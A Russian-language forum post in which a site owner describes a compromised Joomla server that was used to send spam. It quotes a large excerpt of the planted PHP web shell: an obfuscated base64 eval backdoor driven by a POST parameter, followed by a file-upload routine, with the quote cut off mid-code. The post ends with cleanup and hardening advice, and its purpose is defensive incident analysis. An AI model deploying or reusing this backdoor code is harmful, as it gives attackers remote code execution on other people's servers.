Аналогично хакнули где то в конце декабря. Заметил, когда уже пришли абузы на маилспам от AOL и SpamCop. По поведению видно, что хакает кто то один, а потом продает, и уже кому как попадет: кому то заливают JS фреймы, у меня с дедика устроили спам по sendmail, однако ни в один домен не делали никаких вставок ифреймов. Но проверяли запись в морду сайта (сделан touch index.php).
Влезли на 99% через Joomla, т.к. вордпресс вообще не тронут, да и он был самый последний.
Может через уязвимые модули, может через брутфорс (менее вероятно). Пароли FTP/SSH можете не менять, 100% все делалось через HTTP конкретно в этом случае.
Но явно через админку, т.к. тоже залиты "mod_confirmation" и "mod_administrator". А это делается, чтобы получить ПХП шелл, имея доступ к админке Joomla.
Находится все grep ом, и слава богу, потому что ПХП позволяет написать закладку (бэкдор) так, что никакие утилиты уже не помогут, только побайтное сравнение всех скриптов с бэкапом, если он есть.
Кусок шелла, коих было штук 100 копий:
$version = "1.5";
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
$isevalfunctionavailable = false;
$evalcheck = "\$isevalfunctionavailable = true;";
@eval($evalcheck);
if ($isevalfunctionavailable === true) {
$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
$fv = $fnsdht($_POST["gjwqweodsa"]);
@eval($fv);
//@eval($_POST["gjwqweodsa"]);
}else{
$mpath = realpath("")."/";
//$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
@include_once($mpath."dsadasdsa1fag1.php");
@unlink($mpath."dsadasdsa1fag1.php");
}else{
echo "ERROR! CANT DO NOTHING!";
}
}
}
//if (is_uploaded_file($_FILES['file']['tmp_name']))
if(!empty($_POST['fname']) and isset($_POST['fname']) and strlen($_POST['fname'])>0)
{
$fname = trim($_POST['fname']);
$save_type = trim($_POST['save_type']);
$dirname = trim($_POST['dirname']);
$namecrt = trim($_POST['namecrt']);
$auth_pass = trim($_POST['auth_pass']);
$change_pass = trim($_POST['change_pass']);
$file_type = trim($_POST['file_type']);
$ftdata = trim($_POST['ftdata']);
$is_sh = trim($_POST['is_sh']);
if($namecrt == "random"){
$fname = make_name($fname);
}
$uploadfile = "";
if($save_type == "same_dir"){
$uploadfile = realpath("")."/". $fname;
}else if($save_type == "sub_dir"){
$uploadfile = realpath("")."/$dirname/". $fname;
if(!@mkdir(realpath("")."/$dirname/", 0755)){
$uploadfile = realpath("")."/". $fname;
}
}else if($save_type == "root"){
$root = $_SERVER['DOCUMENT_ROOT']."/";
if(@is_writable($root)){
$uploadfile = $root.$fname;
}else{
$uploadfile = realpath("")."/". $fname;
}
}else if($save_type == "root_in_dir"){
Кстати, так и не нашел какой конкретно скрипт занимался маилспамом, откуда брал задания и т.д, так как раньше все снес. Но нашел способ, как отследить через sendmail, какой именно скрипт пхп отправил конкретное письмо (гуглится на stackoverflow типа "find who calling sendmail"). Действительно работает.
Забыл добавить:
Для джумлы закройте просто папку administrator http авторизацией с паролем отличным от пароля админа. Если вычистили все пхп шеллы, должно помочь.
